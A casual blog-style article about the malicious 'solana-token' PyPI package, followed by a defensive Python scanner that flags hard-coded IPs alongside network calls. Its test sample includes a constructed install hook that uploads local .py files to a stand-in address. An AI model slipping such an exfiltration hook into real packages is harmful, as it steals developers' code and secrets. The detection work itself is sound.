A Sneaky PyPI Package Tried to Steal Solana Devs’ Secrets 😈
Picture this: you’re a blockchain developer, sipping coffee ☕, ready to build the next big thing on Solana. You head to the Python Package Index (PyPI) to grab a shiny new tool called solana-token. It looks legit, promising to streamline your blockchain project. But plot twist: this package is a wolf in sheep’s clothing! 🐺 Before PyPI pulled it, it had been downloaded 761 times, and every one of those installs was an attempt to sneak source code and developer secrets off the machine. Let’s dive into this cyber-heist and uncover what went down. 🔍
The Setup: A Fake Solana Tool 🎭
Back in early April 2024, a malicious package named solana-token popped up on PyPI, masquerading as a utility for the Solana blockchain. Solana, for the uninitiated, is a high-speed blockchain platform that’s a darling of DeFi and NFT devs. Naturally, a tool claiming to simplify Solana development would catch some eyes. But here’s the kicker: this package wasn’t about helping devs, it was about helping itself to their sensitive data. 😱
According to ReversingLabs researcher Karlo Zanki, the package was designed to exfiltrate source code and developer secrets to a hard-coded IP address. It was downloaded 761 times before PyPI yanked it from the repository. Downloads aren’t the same as victims (mirrors, scanners and repeat installs all count), but any environment that actually ran the package may have had its project files and secrets shipped off to that address. Ouch! 😣
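The giveaway in this story is the combination of a hard-coded IP literal and an outbound network call inside a package that has no business phoning home. Here is an added, stand-alone check (not code from ReversingLabs, the article, or the solana-token package) that walks a Python file’s AST and flags exactly that pairing, plus a one-liner to confirm whether a given distribution is installed in your environment. The `SAMPLE` hook below is constructed for illustration and uses a TEST-NET documentation address; the set of network call names is an assumption and not exhaustive.

```python
import ast
import re
from importlib import metadata

# Dotted-quad IPv4 literals; deliberately loose, validated in is_valid_ipv4().
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Call targets that open a network connection. Assumption: illustrative list,
# extend it for the libraries your packages actually use.
NETWORK_CALLS = {
    "socket.socket", "socket.create_connection",
    "urllib.request.urlopen",
    "requests.get", "requests.post", "requests.put",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
}


def is_valid_ipv4(text):
    parts = text.split(".")
    return len(parts) == 4 and all(0 <= int(p) <= 255 for p in parts)


def _dotted_name(node):
    """Return 'pkg.mod.func' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source, filename="<unknown>"):
    """Return (kind, lineno, detail) findings for hard-coded IPv4 literals
    and known network calls in one Python source file, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for match in IPV4_RE.findall(node.value):
                if is_valid_ipv4(match):
                    findings.append(("hardcoded_ip", node.lineno, match))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in NETWORK_CALLS:
                findings.append(("network_call", node.lineno, name))
    return sorted(findings, key=lambda f: f[1])


def is_suspicious(findings):
    """Flag a file only when it both embeds an IP literal and opens a socket."""
    kinds = {kind for kind, _, _ in findings}
    return {"hardcoded_ip", "network_call"} <= kinds


def installed_version(dist_name):
    """Installed version of a distribution (e.g. 'solana-token'), or None."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


# Constructed sample of an install-time hook that slurps *.py files and posts
# them to a fixed address. This is NOT the real solana-token code.
SAMPLE = '''
import glob, urllib.request

def collect_and_upload():
    payload = b"".join(open(f, "rb").read() for f in glob.glob("*.py"))
    req = urllib.request.Request("http://203.0.113.7:8080/upload", data=payload)
    urllib.request.urlopen(req)

collect_and_upload()
'''

# Constructed benign file: reads local data, never touches the network.
BENIGN = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    found = scan_source(SAMPLE, "sample_setup.py")
    for kind, line, detail in found:
        print(f"{kind:13} line {line}: {detail}")
    print("suspicious:", is_suspicious(found))
    print("solana-token installed:", installed_version("solana-token"))
```

Run it against the `setup.py` and package modules of anything you are about to `pip install` (a `pip download` into a scratch directory gives you the files without executing them). The pairing rule keeps noise down: a config module with an IP in it, or a client library that legitimately calls `requests.post`, will not trip it on its own.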